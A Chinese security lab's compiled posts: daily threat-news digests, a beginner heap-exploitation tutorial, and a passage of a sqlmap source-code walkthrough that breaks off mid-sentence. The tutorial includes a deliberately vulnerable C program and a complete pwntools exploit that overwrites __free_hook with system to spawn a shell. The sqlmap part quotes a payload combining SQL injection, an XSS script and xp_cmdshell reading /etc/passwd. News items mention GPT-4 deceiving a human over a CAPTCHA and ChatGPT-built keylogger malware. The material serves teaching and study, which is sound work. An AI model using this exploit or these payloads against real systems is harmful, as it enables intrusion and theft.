1、黑客利用恶意NuGet包攻击.NET开发人员 https://www.bleepingcomputer.com/news/security/hackers-target-net-developers-with-malicious-nuget-packages/ 攻击者利用 NuGet 存储库中的虚假软件包，针对 .NET 开发人员进行攻击以传播加密货币窃取程序。其中三个软件包在一个月内被下载超过 15 万次。攻击者还模仿了看起来像是在 NuGet .NET 包管理器上工作的 Microsoft 软件开发人员的账户。 2、报告显示我国网络安全产业处于繁荣发展时期 http://www.anquan419.com/knews/24/4660.html 日前举办的2023年中国网络和数据安全产业高峰论坛“网络安全技术创新赋能产业发展”分论坛上，中国信息通信研究院安全研究所发布《中国网络安全市场洞察报告（2022年）》。报告显示，我国网络安全产业处于繁荣发展时期，产业增速明显高于全球水平，产业发展潜力巨大。 3、General Bytes比特币ATM机因零日漏洞被窃取了160万美元的加密货币 https://thehackernews.com/2023/03/hackers-steal-over-16-million-in-crypto.html General Bytes 比特币 ATM 被黑客攻击，利用零日漏洞窃取了超过 160 万美元的加密货币（包括 56.283 BTC，价值约150万美元，21.823 ETH，价值约 36500 美元，以及 1219.183 LTC，价值约 96500 美元）。攻击者上传了恶意 Java 应用程序，利用 "batm" 用户权限执行攻击。这是 General Bytes 第二次被零日漏洞攻击。 4、法拉利被黑客入侵，大量富豪个人信息泄露 https://www.freebuf.com/news/361129.html 本周一，意大利豪华汽车制造商法拉利公司在其网站上发布了一条消息，该消息表示近日遭到了不明来源的黑客攻击。此次黑客攻击事件导致部分客户的个人信息遭到泄露，目前黑客威胁法拉利公司支付赎金，否则将公布客户的信息，包含联系方式、邮箱等。总部位于意大利马拉内罗的汽车制造商似乎在黑客联系他们之前并不知道他们已被入侵。 5、GPT-4 为通过人机验证，试图雇人给自己打工，还骗了对方 https://www.secrss.com/articles/52877 OpenAI 自己的报告中已有详细说明，这份长达 60 页的报告中，该机构概述了 GPT-4 的各类实验结果和面临的挑战，其中描述的一个案例介绍了 GPT-4 是如何欺骗人类以诱使他们通过验证码（CAPTCHA）测试的。 6、暗网数据泄密网站 BreachForums 站长被捕 https://www.solidot.org/story?sid=74429 美国 FBI 逮捕了一名纽约男子，他被控运营了暗网网络犯罪论坛 BreachForums，该论坛是世界最大的出售被盗数据的网站之一。 7、新的 ShellBot DDoS 机器人恶意软件针对Linux SSH服务 https://securityaffairs.com/143807/cyber-crime/shellbot-targets-linux-ssh-servers.html AhnLab 安全紧急响应中心 (ASEC) 发现了ShellBot恶意软件的一个新变体，该变体被用于针对管理不善的 Linux SSH 服务器的攻击活动。 8、Adobe Acrobat Sign 被滥用以分发恶意软件 网络安全公司 Avast 警告称，已观察到网络犯罪分子滥用 Adobe 的 Acrobat Sign 服务来分发包含 RedLine 窃取程序的恶意电子邮件。 9、Aveva HMI、SCADA 产品中存在可远程利用的漏洞 https://www.securityweek.com/organizations-notified-of-remotely-exploitable-vulnerabilities-in-aveva-hmi-scada-products/ 使用英国工业软件制造商 Aveva 的人机界面 (HMI) 和监控与数据采集 (SCADA) 产品的组织已被告知存在几个潜在的严重漏洞。 10、新的 "HinataBot "僵尸网络可以发动大规模的 DDoS 攻击 https://www.freebuf.com/news/361013.html 一个新的恶意僵尸网络被发现，它以 Realtek SDK、华为路由器和 Hadoop YARN 服务器为目标，将设备引入到 DDoS（分布式拒绝服务）群中，有可能进行大规模攻击。 免责声明 以上内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景网安实验室观点，因此第三方对以上内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景网安实验室无关。以上内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景网安实验室一律不予承担。

浅说一下pwn堆，并用一个简单的例子具体说明，给刚入坑堆的小朋友说的一些思路。 堆是什么 堆，你可以看成一个结构体数组，然后数组里每个元素都会开辟一块内存来存储数据，那么这块用来存储数据的内存就是堆。 结构体数组在BSS段上，其内容就是堆的地址，也就是堆的指针。 堆的理解 堆有很多题型 什么堆溢出，off by null , uaf 等。 核心的话主要是学思想，所有人都知道我要得到shell，cat flag。但是要怎么去干得有个过程， 比如我们做栈题，很容易知道我要劫持栈的返回去执行任意地址，填入shellcode什么的。 堆的话也是一样。 就是用system去执行/bin/sh。越复杂的问题往往只需要很简单的道理。 所以堆到底要怎么去执行。 我们可以把某一个函数的内容改成system，下次调用该函数即是使用system， 再在别的堆里面放入/bin/sh字符串，然后再用刚刚修改的函数，使用已经放入字符串的堆。 即可执行system(/bin/sh)了 一般修改__free_hook，使其内容变成system然后再free掉放有/bin/sh的堆 举例说明 我用一个很简单的例子去一步一步简单剖析。 这里我用一个很简单的例子去一步一步简单剖析。 先给出源码和gcc编译，使用的是Ubuntu18 gcc -o lizi lizi.c#include<stdio.h> #include<stdlib.h> char *heap[0x20]; int num=0; void create() { if(num>=0x20) { puts("no more"); return; } int size; puts("how big"); scanf("%d",&size); heap[num]=(char *)malloc(size); num++; } void show(){  int idx;  char buf[4];  puts("idx");   (read(0, buf, 4));    idx = atoi(buf);  if (!heap[idx]) {    puts("no have things\n"); } else {    printf("Content:");    printf("%s",heap[idx]); } } void dele() {  int idx;  char buf[4];  puts("idx");   (read(0, buf, 4));    idx = atoi(buf);  if (!heap[idx]) {    puts("no have things\n"); } else { free(heap[idx]); heap[idx]=NULL; num--; } } void edit() {  int size;  int idx;  char buf[4];  puts("idx");   (read(0, buf, 4));    idx = atoi(buf);  if (!heap[idx]) {    puts("no have things\n"); } else { puts("how big u read"); scanf("%d",&size); puts("Content:"); read(0,heap[idx],size); } } void menu(void){ puts("1.create"); puts("2.dele"); puts("3.edit"); puts("4.show"); } void main() { int choice; while(1) { menu(); scanf("%d",&choice); switch(choice) { case 1:create();break; case 2:dele();break; case 3:edit();break; case 4:show();break; default:puts("error"); } } } 我们也不用ida了，直接源码分析，很明显在edit处能知道我们可以修改堆大小， 而导致的堆溢出修改下一个堆。 我们可以直接使用unsortedbin，申请较大的堆，再free掉，再申请个小堆， 使其从unsortedbin里面切割堆，这样，你申请的小堆就会有一些unsortedbin里面的东西。 （具体请看unsortedbin介绍） 结合exp介绍： from pwn import * r=process('./lizi') libc=ELF('/lib/x86_64-linux-gnu/libc.so.6') context.log_level='debug' def add(size): r.sendlineafter("4.show\n",'1') r.sendlineafter("idx\n",str(size)) def dele(idx): r.sendlineafter("4.show\n",'2') r.sendlineafter("idx\n",str(idx)) def edit(idx,size,con): r.sendlineafter("4.show\n",'3') r.sendlineafter("idx\n",str(idx)) r.sendlineafter("how big u read\n",str(size)) r.sendafter("Content:\n",con) def show(idx): r.sendlineafter("4.show\n",'4') r.sendlineafter("idx\n",str(idx)) add(0x420) add(0x420) add(0x420) dele(1) add(0x70) show(2) r.recvuntil("Content:") base=u64(r.recv(6)+'\x00'*2)-0x3ec090 print(hex(base)) free=base+libc.sym['__free_hook'] sys=base+libc.sym['system'] add(0x70) dele(3) edit(2,0x100,'a'*0x70+p64(0xa0)+p64(0xa1)+p64(free)) add(0x70) add(0x70) edit(3,0x10,"/bin/sh\x00") edit(4,0x10,p64(sys)) dele(3) r.interactive() 首先菜单不用多说，很简单的交互，写好就行 然后申请3个堆，为了保证能进入unsortedbin，得大于tcache的大小，然后free掉1号堆 unsortedbin all: 0x55ce36aa7aa0 —▸ 0x7f4f9036aca0 (main_arena+96) ◂— 0x55ce36aa7aa0 可以看到1号堆已经进入到unsortedbin了 然后申请一个小堆 pwndbg> x/32gx 0x55697b2cfaa0 0x55697b2cfaa0: 0x0000000000000000 0x0000000000000081 0x55697b2cfab0: 0x00007fb8eada6090 0x00007fb8eada6090 0x55697b2cfac0: 0x000055697b2cfaa0 0x000055697b2cfaa0 0x55697b2cfad0: 0x0000000000000000 0x0000000000000000 0x55697b2cfae0: 0x0000000000000000 0x0000000000000000 0x55697b2cfaf0: 0x0000000000000000 0x0000000000000000 0x55697b2cfb00: 0x0000000000000000 0x0000000000000000 0x55697b2cfb10: 0x0000000000000000 0x0000000000000000 0x55697b2cfb20: 0x0000000000000000 0x00000000000003b1 0x55697b2cfb30: 0x00007fb8eada5ca0 0x00007fb8eada5ca0 0x55697b2cfb40: 0x0000000000000000 0x0000000000000000 0x55697b2cfb50: 0x0000000000000000 0x0000000000000000 0x55697b2cfb60: 0x0000000000000000 0x0000000000000000 0x55697b2cfb70: 0x0000000000000000 0x0000000000000000 0x55697b2cfb80: 0x0000000000000000 0x0000000000000000 0x55697b2cfb90: 0x0000000000000000 0x0000000000000000 查看申请堆的地址可以发现，11行处是已经之前free掉的1号堆，这个申请的堆会在unsortedbin里面切割 然后会有残留地址，然后我们把他show出来就可以计算一波libc地址了。 算出system,__free_hook的libc， 接着为什么要多申请一个堆，这里就是堆溢出的打法了， 在刚刚申请的堆后面再建一个堆，然后通过free掉修改内容指向__free_hook地址 再把内容改成system就可以把free当做system用了； 在edit(2,0x100,'a'*0x70+p64(0xa0)+p64(0xa1)+p64(free))后面打个断点 GDB看看 pwndbg> bin tcachebins 0x80 [ 1]: 0x55f37c653b30 —▸ 0x7f4497d688e8 (__free_hook) ◂— ... fastbins 0x20: 0x0 0x30: 0x0 0x40: 0x0 0x50: 0x0 0x60: 0x0 0x70: 0x0 0x80: 0x0 unsortedbin all: 0x55f37c653ba0 —▸ 0x7f4497d66ca0 (main_arena+96) ◂— 0x55f37c653ba0 smallbins empty largebins empty 会发现tcache里面已经有__free_hook了，因为已经把内容改成__free_hook的地址了。 然后申请2个堆，把tcache里面的__free_hook拿出来。 你也可以验证一下、 pwndbg> vmmap LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA   0x55f37bb59000     0x55f37bb5a000 r-xp     1000 0 pwndbg> x/32gx 0x5597ecced000+0x202040 0x5597eceef040 <heap>: 0x00005597ee8ef680 0x0000000000000000 0x5597eceef050 <heap+16>: 0x00005597ee8efab0 0x00005597ee8efb30 0x5597eceef060 <heap+32>: 0x00007f7694f2e8e8 0x0000000000000000 0x5597eceef070 <heap+48>: 0x0000000000000000 0x0000000000000000 0x202040是heap的偏移，可以从ida里面找到。 申请出来的堆，__free_hook在4号堆 pwndbg> x/32gx 0x00007f7694f2e8e8 0x7f7694f2e8e8 <__free_hook>: 0x0000000000000000 0x0000000000000000 0x7f7694f2e8f8 <next_to_use>: 0x0000000000000000 0x0000000000000000 成功证明， 然后已知4号堆是__free_hook了，那么将4号堆的内容改成system的地址，不就可以了吗 然后再把3号堆写入/bin/sh 然后free（实际上已经变成system）掉3号堆（实际上已经是/bin/sh）了 成功取得shell 总结 做堆题主要是要有一个总体想法就是要把什么变成system去执行shell，或者也有别的，比如malloc等。 这里只是一个总体思路，毕竟拿到堆题如果一条总想法都没有的话，就只能干坐着了。

1、BianLian勒索组织逐渐采用数据泄露勒索代替加密勒索 https://redacted.com/blog/bianlian-ransomware-gang-continues-to-evolve/ 自从我们首次报告被称为 BianLian 的勒索软件组织以来，我们一直在关注他们的活动。最值得注意的是，BianLian已经将攻击的主要重点从勒索加密文件转移到更多地关注数据泄露勒索，以此作为从受害者那里勒索的手段。 2、Play勒索组织攻击了荷兰航运公司Royal Dirkzwager https://securityaffairs.com/143714/cyber-crime/play-ransomware-royal-dirkzwager.html Play 勒索软件组袭击了荷兰海运物流公司Royal Dirkzwager。Royal Dirkzwager 专注于优化航运流程和管理海运物流信息。勒索组织宣布窃取了私人机密数据、员工 ID、护照、合同等。该团伙最初泄露了一个 5 GB 的档案作为攻击的证据，并威胁说如果不支付赎金，就会泄露全部文件。 3、NBA第三方通讯供应商泄露了部分球迷信息 https://securityaffairs.com/143693/data-breach/nba-data-breach.html 在一家提供时事通讯服务的第三方公司遭到网络攻击后，NBA披露了一起数据泄露事件。NBA称，未经授权的第三方创建了部分粉丝的姓名和电子邮件地址的副本。数据泄露并未泄露用户名、密码和其他信息。 4、报告称超10%的组织访问过已知的C2服务器 https://www.csoonline.com/article/3690518/dns-data-shows-one-in-10-organizations-have-malware-traffic-on-their-networks.html 根据云和内容交付网络提供商Akamai的一份报告，去年10% 到 16% 组织网络中的 DNS 流量流向过与已知僵尸网络和各种其他恶意软件威胁相关的命令和控制 (C2) 服务器。报告称，超过四分之一的流量流向了属于初始访问代理商的服务器，攻击者将对公司网络的访问权出售给其他网络犯罪分子。 5、卡巴斯基发布了针对基于 Conti 的勒索软件的新解密器 https://securityaffairs.com/143687/cyber-crime/kaspersky-decryptor-conti-based-ransomware.html 卡巴斯基基于此前泄露的Conti勒索软件源代码，发布了新版Conti勒索软件解密工具。 6、臭名昭著的 Emotet 恶意软件卷土重来，通过OneNote进行传播 https://securityaffairs.com/143722/cyber-crime/emotet-microsoft-onenote-campaign.html Emotet 恶意软件在中断三个月后卷土重来，威胁者正在通过 Microsoft OneNote 电子邮件分发它。 7、Mispadu 银行木马针对拉丁美洲国家用户进行凭证窃取 https://thehackernews.com/2023/03/mispadu-banking-trojan-targets-latin.html 一个名为Mispadu的银行木马与多个针对玻利维亚、智利、墨西哥、秘鲁和葡萄牙等国家的垃圾邮件活动有关，其目的是窃取凭证并提供其他有效载荷。 8、新的 DotRunpeX 恶意软件通过恶意广告传播多个恶意软件 https://thehackernews.com/2023/03/new-dotrunpex-malware-delivers-multiple.html 一种名为dotRunpeX的新恶意软件正在用于分发许多已知的恶意软件系列，例如Agent Tesla、Ave Maria、BitRAT、FormBook、LokiBot、NetWire、Raccoon Stealer、RedLine Stealer、Remcos、Rhadamanthys和Vidar。 9、《电信领域违法行为举报处理规定》发布 ，6 月 1 日起施行 http://www.anquan419.com/knews/24/4644.html 为规范电信领域违法行为举报处理工作，维护电信市场秩序，保护电信用户合法权益，根据《中华人民共和国行政处罚法》《中华人民共和国电信条例》等法律法规，结合工作实际，工业和信息化部近日印发《电信领域违法行为举报处理规定》。 10、 FCC 出台新规，要求美国无线运营商屏蔽诈骗短信 https://www.ithome.com/0/680/281.htm 美国联邦通信委员会（FCC）近日宣布通过一项新的法案，要求包括运营商在内的无线公司屏蔽诈骗短信。 免责声明 以上内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景网安实验室观点，因此第三方对以上内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景网安实验室无关。以上内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景网安实验室一律不予承担。

1、TeamTNT组织被怀疑使用挖矿程序掩饰数据窃取的目的 https://thehackernews.com/2023/03/cryptojacking-group-teamtnt-suspected.html Cado Security详细介绍了一种名为SCARLETEEL的攻击，旨在针对容器化环境，最终窃取专有数据和软件。但该攻击链的早期阶段涉及使用加密货币挖掘程序，云安全公司怀疑该程序被部署为诱骗挖矿程序，以掩盖数据外泄的检测。Cado Security的一项新分析显示，这个样本“具有相似之处，包含一个曾被归属于TeamTNT的钱包ID”，这表明样本与TeamTNT有关。 2、攻击者利用伪造的Telegram和WhatApp网站投递木马 https://thehackernews.com/2023/03/lookalike-telegram-and-whatsapp.html 类似Telegram和WhatsApp的即时通讯应用程序的山寨伪造网站被用来传播木马程序，感染Android和Windows用户的设备，并在攻击中使用了加密货币剪贴板劫持器（clipper）恶意软件。这是首次发现clipper恶意软件被内置到即时消息应用程序中。此外，一些应用程序使用光学字符识别(OCR)技术来识别存储在受感染设备上的屏幕截图中的文本，这对于Android恶意软件也是首次出现。 3、研究人员披露针对PyPI库的8起攻击事件 https://blog.sonatype.com/top-8-malicious-attacks-recently-found-on-pypi Python包索引（PyPI）是Python软件包的官方存储库，Python开发人员广泛使用它来查找和安装有用的库和工具。然而，与其他软件存储库一样，PyPI也可能受到不良行为者的攻击。Sonatype的安全研究团队近期发现了PyPI上的8次恶意攻击并进行披露，旨在让更多人了解这个问题。 4、Conti勒索软件的MeowCorp变种现已有免费解密器 https://www.bleepingcomputer.com/news/security/conti-based-ransomware-meowcorp-gets-free-decryptor/ 网络安全公司卡巴斯基的研究员在一个论坛上发现了漏洞，使得他们在该论坛上获取到了包含 258 个修改版 Conti 勒索软件变种的私钥缓存。过去一年间，该变种被用于攻击各种私人和公共组织，一些研究员将其命名为 MeowCorp。 5、美国FBI、CISA和MS-ISAC发布Lockbit 3.0勒索软件的警告 https://securityaffairs.com/143668/breaking-news/lockbit-3-0-ransomware-joint-alert.html 美国联邦调查局 (FBI)、网络安全和基础设施安全局 (CISA) 以及多州信息共享与分析中心 (MS-ISAC) 发布了一份联合警报，提供了与臭名昭著的LockBit 3.0勒索软件相关的威胁指示器（IOCs）以及战术、技术和过程（TTPs）。 6、研究人员发现一种基于 Go 的新 DDoS 僵尸网络：HinataBot https://securityaffairs.com/143618/cyber-crime/hinatabot-go-based-ddos-botnet.html Akamai 研究人员发现了一个新的基于 DDoS Golang 的僵尸网络，称为 HinataBot，通过利用已知缺陷来破坏路由器和服务器。 7、研究人员利用ChatGPT实现动态生成代码的恶意软件 https://www.hackread.com/chatgpt-blackmamba-malware-keylogger/ HYAS Institute 研究员和网络安全专家 Jeff Sims 开发了一种名为 Blackmamba 的新型ChatGPT驱动的键盘记录恶意软件，它可以绕过终端安全软件。它每次执行都会调用 ChatGPT/text-DaVinci-003，编写一个独特的键盘记录器 Python 脚本。 8、攻击者利用Adobe Acrobat Sign传播Redline窃密木马 https://www.bleepingcomputer.com/news/security/adobe-acrobat-sign-abused-to-push-redline-info-stealing-malware/ 网络攻击者滥用在线文档签名服务 Adobe Acrobat Sign 向用户投递信息窃取恶意软件。利用该服务发送恶意电子邮件，可以绕过安全保护并诱使收件人信任收到的电子邮件。Avast的研究人员报告了这一新攻击手法。 9、Winter Vivern APT组织针对多国发起攻击 https://thehackernews.com/2023/03/winter-vivern-apt-group-targeting.html Winter Vivern组织（也被称为 UAC-0114）上个月在乌克兰计算机应急响应小组 (CERT-UA) 详细介绍针对乌克兰和波兰的恶意软件活动后引起了人们的注意，攻击活动中该组织传播一种名为 Aperetif 的恶意软件。虽然威胁行为者的来源尚不清楚，但攻击模式表明该组织可能支持白俄罗斯和俄罗斯。 10、Clop 勒索软件通过 GoAnywhere 零日漏洞攻击并窃取了日立能源的数据 https://securityaffairs.com/143640/data-breach/hitachi-energy-data-breach.html 日立能源披露了一起数据泄露事件，Clop 勒索软件团伙利用最近的 GoAnywhere 零日漏洞窃取了公司数据。 免责声明 以上内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景网安实验室观点，因此第三方对以上内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景网安实验室无关。以上内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景网安实验室一律不予承担。

1、Web3中的Payzero骗局会让受害者一无所有 https://www.4hou.com/posts/17KV 诈骗者通过伪造的智能合约锁定潜在受害者，然后悄悄盗取受害者的数字资产，如NFT代币。我们把这个诈骗命名为“（Payzero）零支付”。 2、LockBit勒索组织声称攻击了Essendant公司 https://www.bleepingcomputer.com/news/security/lockbit-ransomware-claims-essendant-attack-company-says-network-outage-/ LockBit 勒索软件组织声称对办公产品批发分销商 Essendant 发起了网络攻击，而此前该公司由于“重大”且持续的故障而导致运营中断。正如BleepingComputer早些时候报道的那样，Essendant 大范围的网络中断一直在影响在线订单的下达或执行，影响了公司的客户和供应商。货运公司也被告知暂缓取件。 3、警方关闭了与超30亿美元洗钱有关的混币器平台 https://cyberscoop.com/police-shut-down-cryptocurrency-mixer-chipmixer/ 欧洲和美国执法官员周三宣布，他们已经取缔了一个加密货币混合器，该混合器负责处理价值超过 30 亿美元的与犯罪活动相关的交易。加密货币混合器从不同的账户中转移资金，以帮助用户隐藏他们资金的来源，以此实现更隐蔽的加密货币资金转移。 4、多个黑客组织利用存在超过3年的漏洞入侵美国联邦机构 https://thehackernews.com/2023/03/multiple-hacker-groups-exploit-3-year.html 多个威胁组织利用Progress Telerik存在的三年安全漏洞，成功入侵了一个美国联邦机构。此消息来自于网络安全和基础设施安全局（CISA）、联邦调查局（FBI）和多州信息共享与分析中心（MS-ISAC）发布的联合消息。这些机构表示：“利用此漏洞允许恶意行为者在联邦文职行政部门（FCEB）机构的Microsoft Internet信息服务（IIS）Web服务器上成功执行远程代码。” 5、医疗供应商ILS数据泄露影响超420万人 https://www.govinfosecurity.com/long-term-care-services-firm-says-breach-affects-42-million-a-21448 Independent Living Systems (ILS) 是一家为老年和残疾患者提供管理式医疗服务的供应商。据披露，该组织去年夏天发生的网络安全事件已经影响了超过 420 万人，ILS 尚未澄清该事件是否是勒索软件导致。 6、三星 Exynos 芯片组中的基带 RCE 漏洞使设备面临远程黑客攻击 https://securityaffairs.com/143582/hacking/baseband-flaws-samsung-exynos.html Google’s Project Zero 在三星的 Exynos 芯片组中发现了多个缺陷，这些缺陷使设备在没有用户交互的情况下被远程黑客攻击。 7、Mozilla 通过发布 Firefox 111 修补高危漏洞 https://www.securityweek.com/mozilla-patches-high-severity-vulnerabilities-with-release-of-firefox-111/ Firefox 111 修补了 13 个 CVE，包括几个被归类为高严重性的漏洞。 8、CISA 发布紧急警告：Adobe ColdFusion 漏洞正在被利用 https://thehackernews.com/2023/03/cisa-issues-urgent-warning-adobe.html CISA 将 Adobe ColdFusion 漏洞（CVE-2023-26360）添加到已知被利用漏洞目录中。 9、越来越多的 DigitalOcean 服务器被用于诈骗与钓鱼攻击 https://www.freebuf.com/articles/network/360464.html Netskope 发现在过去的六个月中，部署在 DigitalOcean 上的恶意网页流量增长了 17 倍。研究人员发现攻击者模仿 Windows Defender 欺骗用户，使用户以为其计算机已经被攻陷且需要技术支持，诱骗受害者拨打虚假的“求助热线”。随后，攻击者远程访问受害者的计算机并且安装恶意软件，或者要求用户支付清除感染的服务费。 10、9亿条印度警方业务机密数据疑似在暗网销售 https://www.secrss.com/articles/52784 超过9亿份印度法律文件记录/文档、被捕/被控人以及警方/法庭报告在暗网售卖。 免责声明 以上内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景网安实验室观点，因此第三方对以上内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景网安实验室无关。以上内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景网安实验室一律不予承担。

0x01 前言 因为代码功底太差，所以想尝试阅读 sqlmap 源码一下，并且自己用 golang 重构，到后面会进行 ysoserial 的改写；以及 xray 的重构，当然那个应该会很多参考 cel-go 项目。 0x02 环境准备 sqlmap 的项目地址：https://github.com/sqlmapproject/sqlmap用 pycharm 打断点调试，因为 vscode 用来调试比较麻烦。 因为要动调，所以需要一个 sql 注入的靶场，这里直接选用的是 sql-labs，用 docker 起 docker pull acgpiano/sqli-labs docker run -dt --name sqli-lab -p [PORT]:80 acgpiano/sqli-labs:latest 最后还需要重新配置一下数据库，然后才能以 sqli-labs 为靶场进行测试。 这里也挂一下 sqlmap 对应的一些基础操作 ———— https://www.cnblogs.com/hongfei/p/3872156.html 直接在 pycharm 的 Debug 下进行调试，设置参数如下，开始调试 -u "http://81.68.120.14:3333/Less-1/?id=1" -technique=E --dbs 0x03 sqlmap 源码阅读 在开始之前我们有必要确认一下 sqlmap 运行的流程图，很重要！这样有助于我们进一步分析源码。 1. 初始化 在 sqlmap.py 的 main 函数下断点，开始调试 在没有对 URL 进行发包/探测的时候 sqlmap 会先对一些环境、依赖、变量来做一些初始化的处理 往下，通过 cmdLineParser() 获取参数，cmdLineParser() 通过 argparse 库进行 CLI 的打印与获取，类似的一个小项目我之前也有接触过 https://github.com/Drun1baby/EasyScan 往下 initOptions(cmdLineOptions) 解析命令行参数 init 函数： 初始化 在 init() 函数中通过调用各种函数进行参数的设置、payload 的加载等，有兴趣的师傅可以点进去阅读一下。 其中这三个相对比较重要，是用来加载 payload 的 ———— loadBoundaries()、loadPayloads()、_loadQueries()， loadBoundaries()  // 加载闭合符集合 loadPayloads()    // 加载 payload 集合 _loadQueries()    // 加载查询语句，在检测到注入点之后后续进行数据库库名字段名爆破会用到的语句 下个断先点调试一下 loadBoundaries() 函数 首先，会去加载 paths.BOUNDARIES_XML，也就是 data/xml/boundaries.xml 接着进入解析 XML 文件的部分，跟进 parseXmlNode(root) 最终添加到 conf 对象的 tests 属性里 loadPayloads() 函数与 _loadQueries() 函数大体上也是如此，都是做了解析 xml 文件的工作，再将内容保存到 conf 对象的 tests 属性里。像 loadPayloads() 函数，最后在 conf.tests 里面可以很清晰的看到 payloads 此时我们还可以看一下 conf 是什么 conf 属性中主要存储了一些目标的相关信息（hostname、path、请求参数等等）以及一些配置信息，init 加载的 payload、请求头 header、cookie 等 init() 函数执行完毕后，就会来到 start() 函数进行项目的正式运行。 初始化功能点小结 简单概括一下初始化部分的代码做了什么事 获取命令行参数并处理 初始化全局变量 conf 以及 kb 获取并解析几个 xml 文件，完成闭合工作、payloads 加载工作 设置 HTTP 相关配置，如 HTTP Header，UA，Session 等 2. URL 处理 f8 下来，先到的是 threadData = getCurrentThreadData()，继续往下走，到 result = f(*args, **kwargs) 代码块，跟进一下 代码逻辑此时来到了 /lib/controller/controller.py 下，往下走，是不会进到 conf.direct 和 conf.hashFile 中的，会直接进入到 kb.targets.add() 的代码逻辑里面。 此处的 kb 变量的作用是共享一些对象，其实本质上是保存了注入时的一些参数。kb.targets 添加了我们输入的参数，如图 往下看，大体上是做了一些类似类似打印日志、赋值、添加 HTTP Header 等工作，这一部分代码我们就不看了，直接看最关键的这一部分代码 parseTargetUrl()。 跟进 一开始先进行了这一判断 if re.search(r"://\[.+\]", conf.url) and not socket.has_ipv6 判断 http:// 的开头形式是否正确，以及 socket 是否为 ipv6 协议，如果为 ipv6 协议，那么 sqlmap 并不支持。 接着判断 if not re.search(r"^(http|ws)s?://", conf.url, re.I): 判断是 http 开头还是 https 开头，又或者是否是 ws/wss 开头，如果没有这些开头，则就从端口判断，这里我认为或许可以加上 80 与 8080 端口。 继续往下看，进行了 url 的拆分、host 的拆分，并将这些内容保存到 conf 里面的对应属性，后续也是一些基础的判断与赋值，这里不再赘述。 总而言之是在对 URL 进行剖析与拆解，最后这些东西都是放到 conf 里面的 3. 如果这个网站已经被注入过，生成注入检测的payload 核心代码在 controller.py 的第 434 行，需跟进；此处我们可以设置对 kb.injections 的变量监测。先跟进 setupTargetEnv() 函数 setupTargetEnv() 函数调用了如下图所示的七个函数 我们跟进最主要的 _resumeHashDBValues() 函数，首先调用了 hashDBRetrieve() 函数，设置检索 出来，到第 476 行，这一次又调用了 hashDBRetrieve() 函数，传参是 HASHDB_KEYS.KB_INJECTIONS，意思就是以 KB_INJECTIONS 作为 KEY 进行检索。跟进发现函数先将需要注入的 URL 信息放到了 _这个变量中，并将基础信息用 | 符号隔开。 跟进 retrieve() 函数，这个函数做了生成 payload 的工作，具体是怎么生成的我们继续往下看 第 95 行，这里很重要，执行了 SQL 语句，并通过 Hash 加密，加密方式是 base64Pickle 序列化 最终反序列化解密 Payload，说实话这里没看懂是怎么生成的，看上去仅仅是执行了一个 SQL 语句，后面看其他师傅的文章的时候并没有把这一段单独拉出来说，payloads 其实都放在 xml 当中。 接着再循环一次，生成一个 payload 在生成完所有 payload 之后会先对目标进行一次探测，如果 Connection refused 则返回 False 这里生成的 payload 只是很基础的一部分，并非是 4. WAF 检测 解析完 URL 之后对目标进行探测，往下看，位置是 controller.py 的第 439 行，第 448 行有 checkWaf() 的函数，很明显就是要做 WAF 检测的功能。 先会判断这一目标是否存在 WAF，如果存在 WAF 的话，会进行字符的相关 fuzz，当然此处建议对一个存在 WAF 的目标进行测试。值得注意的是，如果这个目标你已经探测过存在 waf，且已知 waf 归属厂商的情况下，就不会走到 payload 那一段代码逻辑当中去，相关的业务代码在 hashDBRetrieve() 下，此处不再展开，比较容易。 如果存在 WAF，则会生成用于 fuzz 的 payload，这个 payload 是基于这个 NMAP 的 http-waf-detect.nse ———— https://seclists.org/nmap-dev/2011/q2/att-1005/http-waf-detect.nse 设置 payload 类似于 "9283 AND 1=1 UNION ALL SELECT 1,NULL,'<script>alert("XSS")</script>',table_name FROM information_schema.tables WHERE 2>1--/**/; EXEC xp_cmdshell('cat ../../../etc/passwd')#"，如果没有 WAF，页面不会变化，如果有 WAF，因为 payload 中有很多敏感字符，大多数时候页面都会发生改变。 接下来的 conf.identifyWaf 代表 sqlmap 的参数 --identify-waf,如果指定了此参数，就会进入 identifyWaf() 函数，主要检测的 waf 都在 sqlmap 的 waf 目录下。不过新版的 sqlmap 已经将这一参数的功能自动放到里面了，无需再指定参数 这里的 payload 先经过处理后赋值给 value，再将 value 作为参数传入 queryPage() 请求中，跟进 在经过很长一段的数据处理与判断代码后，我们到第 1531 行，如图，跟进；getPage() 函数的作用是获取界面的一些信息，如 url，ua，host 等，通过输出比对 payload，为判断 waf 类型提供信息。 获取基本信息 这些基础信息最后都会保存在 response 系列的 message 当中 getPage() 函数中调用了 processResponse() 函数做响应结果的处理，跟进 往下看，到 401 行开始，后续的代码进行了 Waf 的识别 跟进 identYwaf.non_blind_check()，是通过正则表达式来对页面进行匹配，对应的规则在 thirdparty/identywaf/data.json 中 同时 sqlmap 不光通过规则库来进行判断，也会通过页面相似度来判断是否存在 waf/ips 如果相似度小于设定的 0.5 那么就判定为有 waf 拦截 WAF 注入总结 总结一下就是两点，一种方法是通过正则匹配的检测，另外一种方法是根据页面相似度来检测，我自己应该很难写出来 waf 检测的东西；届时再做尝试。 5. 注入检测之启发式注入 从 checkWaf() 函数里面出来，先到第 457 行，检测网站是否稳定（因为有些网站一测试可能就炸了）对应此 info [INFO] testing if the target URL content is stable 继续往下走到第 471 行，会先判断参数是否可以注入，这里与命令的参数 —— --level 挂钩 在前文环境准备的时候我们采用的方式是报错注入，如果不这么做，直接指定参数 --dbs，无法进入到启发式注入里面。我们接着看代码，往下直到第 581 行，调用的 heuristicCheckSqlInjection() 函数，意思是启发性注入。 启发式注入做了哪些工作 1、数据库版本的识别2、绝对路径获取3、XSS 的测试 数据库版本的识别 首先会从 HEURISTIC_CHECK_ALPHABET 中随机抽取10个字符出现构造 Payload，当然里面的都不是些普通的字符，而且些特殊字符，当我们进行 SQL 